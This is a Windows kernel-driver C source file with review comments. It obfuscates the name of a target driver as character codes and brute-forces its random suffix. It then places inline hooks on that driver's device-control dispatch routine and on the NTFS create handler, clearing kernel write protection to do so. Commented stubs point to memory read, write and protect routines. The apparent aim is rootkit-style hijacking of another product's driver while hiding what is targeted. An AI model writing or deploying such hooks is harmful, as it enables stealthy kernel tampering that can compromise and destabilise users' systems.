patch.c
#include <ntdef.h>
#include <ntifs.h>
#include "inlineHook.h"
#include "patchFun.h"
#include "replaceData.h"
// Replacement dispatch routine defined in another translation unit. HookLuDashi
// passes it to CopyMyFun (presumably producing a pool copy, since the result is
// later released with ExFreePoolWithTag) and installs that copy as the hook.
extern NTSTATUS FASTCALL _myIrpDispath(IN PDEVICE_OBJECT DeviceObject, IN OUT PIRP Irp);
// ObReferenceObjectByName is exported by the kernel but not declared in the
// public WDK headers, hence the local prototype. On success *Object receives a
// referenced pointer; the callers below release it with ObfDereferenceObject.
NTKERNELAPI NTSTATUS ObReferenceObjectByName(
    IN PUNICODE_STRING ObjectName,
    IN ULONG Attributes,
    IN PACCESS_STATE PassedAccessState OPTIONAL,
    IN ACCESS_MASK DesiredAccess OPTIONAL,
    IN POBJECT_TYPE ObjectType,
    IN KPROCESSOR_MODE AccessMode,
    IN OUT PVOID ParseContext OPTIONAL,
    OUT PVOID *Object
);
// Exported object type used below to look up driver objects (\Driver\..., \FileSystem\...).
// Note the extra indirection: the lookups pass *IoDriverObjectType.
extern POBJECT_TYPE* IoDriverObjectType;
//////////////////////////////////////////////////////////////////////////
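// Hook bookkeeping. These four globals are shared by HookLuDashi/UnHookLuDashi
// AND HookNTFS/UnHookNTFS, so only one hook is tracked at a time: a second
// Hook* call overwrites them and the first hook can no longer be removed.
void* g_luOldAddr = NULL;     // address of the dispatch routine that was hooked
void* g_originalAddr = NULL;  // filled by HookKernelApi; non-NULL means a hook is installed
ULONG g_patchSize = 0;        // filled by HookKernelApi; integer, so initialise with 0 rather than NULL
PVOID g_myIrpAddrNew = NULL;  // result of CopyMyFun (pool memory); released in UnHookLuDashi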
// Locate the target driver object by name and place an inline hook on its
// IRP_MJ_DEVICE_CONTROL dispatch routine, diverting it to a pool copy of
// _myIrpDispath. Hook state is left in the g_* globals for UnHookLuDashi.
// Presumably PASSIVE_LEVEL only (object-manager lookup, pool allocation).
void HookLuDashi()
{
    NTSTATUS result;
    UNICODE_STRING DestinationString;
    // Driver object path kept as raw character codes instead of a string
    // literal. Decoded, the array reads "\Driver\dump_dumplds" followed by one
    // variable character (index 20) and the terminator; the earlier
    // "\Driver\driverMain" comment did not match the encoded bytes.
    // The final character of the target's name is a random letter a-z, so all
    // 26 candidates are tried in turn.
    wchar_t linkPath[] = { 92,68,114,105,118,101,114,92,100,117,109,112,95,100,117,109,112,108,100,115,0,0 };
    PDRIVER_OBJECT pDriver = NULL;
    for (int i = 0; i < 26; i++)
    {
        linkPath[20] = 97 + i;  // 97 is L'a'
        RtlInitUnicodeString(&DestinationString, linkPath/*L"\\Driver\\ComputerZ"*/);
        result = ObReferenceObjectByName(&DestinationString,
            OBJ_CASE_INSENSITIVE, NULL, NULL,
            *IoDriverObjectType, KernelMode, NULL, (PVOID)&pDriver);
        if (NT_SUCCESS(result))
            break;  // pDriver now holds a reference, released below
        pDriver = NULL;
    }
    // Format string "pDriver:%p result:%lx IoDeviceObjectType:%p\n", again as
    // character codes. NOTE(review): a non-literal format string disables the
    // compiler's format/argument checking; also, IoDriverObjectType is a
    // POBJECT_TYPE*, so the third %p prints the address of the exported
    // variable rather than the object type it points to.
    char printStr[] = { 112,68,114,105,118,101,114,58,37,112,32,114,101,115,117,108,116,58,37,108,120,32,73,111,68,101,118,105,99,101,79,98,106,101,99,116,84,121,112,101,58,37,112,92,110,0 };
    DbgPrint(printStr, pDriver, result, IoDriverObjectType);
    // After the loop, result is the status of the LAST attempted name; on
    // total failure it describes the 'z' candidate only.
    if (NT_SUCCESS(result))
    {
        KIRQL oldIrql;  // NOTE(review): unused
        g_luOldAddr = pDriver->MajorFunction[IRP_MJ_DEVICE_CONTROL];
        // Read the first 4 bytes of the dispatch routine to see whether a hook
        // is already present. WPOFFx64/WPONx64 presumably toggle CR0.WP; a read
        // does not require write protection to be lifted, so this pair is
        // unnecessary here and, if it does clear CR0.WP, needlessly widens the
        // window in which kernel write protection is off.
        KIRQL irql = WPOFFx64();
        __int32 hookFlag = *(__int32*)g_luOldAddr;
        WPONx64(irql);
        // 0x25FF little-endian is the byte pair FF 25 (indirect jmp opcode),
        // used as the signature of an already-installed hook. NOTE(review): all
        // four bytes are compared, so this only matches when the next two bytes
        // are zero — confirm against what HookKernelApi actually writes.
        if (hookFlag != 0x25FF)
        {
            InitFunTable();
            // hook begins
            g_myIrpAddrNew = CopyMyFun(_myIrpDispath, NULL);
            // NOTE(review): g_myIrpAddrNew is not checked for NULL before it is
            // installed as the hook target.
            HookKernelApi(g_luOldAddr, g_myIrpAddrNew, &g_originalAddr, &g_patchSize);
        }
        else
        {
            // "Driver had run...\n" — NOTE(review): this printStr shadows the outer one.
            char printStr[] = { 68,114,105,118,101,114,32,104,97,100,32,114,117,110,46,46,46,92,110,0 };
            DbgPrint(printStr);
        }
        ObfDereferenceObject(pDriver);
    }
    // NOTE(review): when the lookup fails, only the DbgPrint above reports it;
    // the caller has no return value to check.
    /*
    PDEVICE_OBJECT DeviceObject = NULL;
    PIRP Irp = NULL;
    myIrpDispath(DeviceObject, Irp);
    DoMemBase(NULL);
    DoMemRead(NULL);
    DoMemWrite(NULL);
    DoMemAlloc(NULL);
    DoMemProtect(NULL);
    EncryptDecryptBuf(NULL, NULL, NULL);*/
}
// Remove the hook installed by HookLuDashi and release the pool copy of the
// hook routine. No-op while g_originalAddr is NULL (nothing was hooked).
// NOTE(review): the globals are not reset afterwards, so a second call repeats
// the unhook and frees g_myIrpAddrNew a second time. ExFreePoolWithTag does not
// accept NULL either, which is what g_myIrpAddrNew holds if CopyMyFun failed.
// Nothing here waits for threads that may still be executing inside the copy
// before it is freed. Because the g_* globals are shared with HookNTFS, this
// removes whichever hook was installed most recently.
void UnHookLuDashi()
{
    if (g_originalAddr)
    {
        UnhookKernelApi(g_luOldAddr, g_originalAddr, g_patchSize);
        ExFreePoolWithTag(g_myIrpAddrNew, 0);
    }
}
// Test dispatch routine that HookNTFS installs in place of the target driver's
// IRP_MJ_CREATE handler. Completes the request itself only for one magic
// value; every other request is forwarded to the original routine.
// Returns the original handler's status, or STATUS_SUCCESS when completed here.
NTSTATUS FASTCALL myIrpDispathTest(IN PDEVICE_OBJECT DeviceObject, IN OUT PIRP Irp)
{
    //DbgPrint("myIrpDispath ENTRY!");
    NTSTATUS NtStatus = STATUS_SUCCESS;
    PIO_STACK_LOCATION pIoStackIrp = NULL;
    // Same field IoGetCurrentIrpStackLocation(Irp) returns, read directly from the IRP.
    pIoStackIrp = /*((IoGetCurrentIrpStackLocation_)FLAG_IoGetCurrentIrpStackLocation)*/Irp->Tail.Overlay.CurrentStackLocation;
    if (pIoStackIrp && pIoStackIrp->MajorFunction == IRP_MJ_CREATE)
    {
        // NOTE(review): for IRP_MJ_CREATE the active member of the Parameters
        // union is Parameters.Create; reading DeviceIoControl.IoControlCode here
        // yields overlapping Create fields, not a control code.
        ULONG loControlCodes = pIoStackIrp->Parameters.DeviceIoControl.IoControlCode; // I/O control code
        DbgPrint("myIrpDispath ENTRY!");
        // ULONG compared with -1: matches 0xFFFFFFFF after the usual arithmetic conversion.
        if (loControlCodes == -1)
        {
            Irp->IoStatus.Information = 0;
            Irp->IoStatus.Status = STATUS_SUCCESS;
            MyStruct* myData = (MyStruct*)FLAG_MYSTRUCT;  // NOTE(review): unused
            IofCompleteRequest(Irp, IO_NO_INCREMENT);
            return NtStatus;
        }
    }
    /*
    ((IofCompleteRequest_)FLAG_IofCompleteRequest)(Irp, IO_NO_INCREMENT);
    return NtStatus;*/
    // Resume the original handler 0xF bytes past its entry, presumably skipping
    // the bytes the inline hook overwrote. NOTE(review): whether that is valid
    // depends on what those bytes were; HookKernelApi also hands back
    // g_originalAddr and g_patchSize, which may be the intended way to reach
    // the original — confirm against inlineHook. The integer-to-pointer
    // conversion is done without a cast.
    PDRIVER_DISPATCH oldEnter = (ULONG64)g_luOldAddr + 0xF;
    NTSTATUS status = oldEnter(DeviceObject, Irp);
    return status;
}
// Look up the NTFS file-system driver object and place an inline hook on its
// IRP_MJ_CREATE dispatch routine, diverting it to myIrpDispathTest.
// NOTE(review): this writes the same g_luOldAddr/g_originalAddr/g_patchSize
// globals HookLuDashi uses, so the two hooks cannot coexist or be removed
// independently. Every create/open on an NTFS volume then passes through
// myIrpDispathTest, so any fault in it is system-wide.
void HookNTFS()
{
    NTSTATUS result;
    UNICODE_STRING DestinationString;
    PDRIVER_OBJECT pDriver = NULL;
    RtlInitUnicodeString(&DestinationString, L"\\FileSystem\\Ntfs");
    result = ObReferenceObjectByName(&DestinationString,
        OBJ_CASE_INSENSITIVE, NULL, NULL,
        *IoDriverObjectType, KernelMode, NULL, (PVOID)&pDriver);
    // IoDriverObjectType is a POBJECT_TYPE*, so the last %p prints the address
    // of the exported variable, not the object type.
    DbgPrint("pDriver:%p result:%lx IoDeviceObjectType:%p\n", pDriver, result, IoDriverObjectType);
    if (NT_SUCCESS(result))
    {
        KIRQL oldIrql;  // NOTE(review): unused
        g_luOldAddr = pDriver->MajorFunction[IRP_MJ_CREATE];
        // Read the first 4 bytes of the handler to detect an existing hook.
        // WPOFFx64/WPONx64 presumably toggle CR0.WP; a read does not need
        // write protection lifted, so the pair is unnecessary around this read.
        KIRQL irql = WPOFFx64();
        __int32 hookFlag = *(__int32*)g_luOldAddr;
        WPONx64(irql);
        // 0x25FF little-endian is FF 25 (indirect jmp), taken as the signature
        // of an already-installed hook; all four bytes are compared, so this
        // only matches when the following two bytes are zero.
        if (hookFlag != 0x25FF)
        {
            // hook begins
            HookKernelApi(g_luOldAddr, myIrpDispathTest, &g_originalAddr, &g_patchSize);
        }
        else
        {
            // "Driver had run...\n"
            char printStr[] = { 68,114,105,118,101,114,32,104,97,100,32,114,117,110,46,46,46,92,110,0 };
            DbgPrint(printStr);
        }
        ObfDereferenceObject(pDriver);
    }
}
// Remove the hook installed by HookNTFS. No-op while g_originalAddr is NULL.
// NOTE(review): g_originalAddr and g_patchSize are not reset afterwards, so a
// second call repeats the unhook against an already-restored routine. The g_*
// globals are shared with HookLuDashi, so this removes whichever hook was
// installed most recently, not necessarily the NTFS one.
void UnHookNTFS()
{
    if (g_originalAddr)
    {
        UnhookKernelApi(g_luOldAddr, g_originalAddr, g_patchSize);
    }
}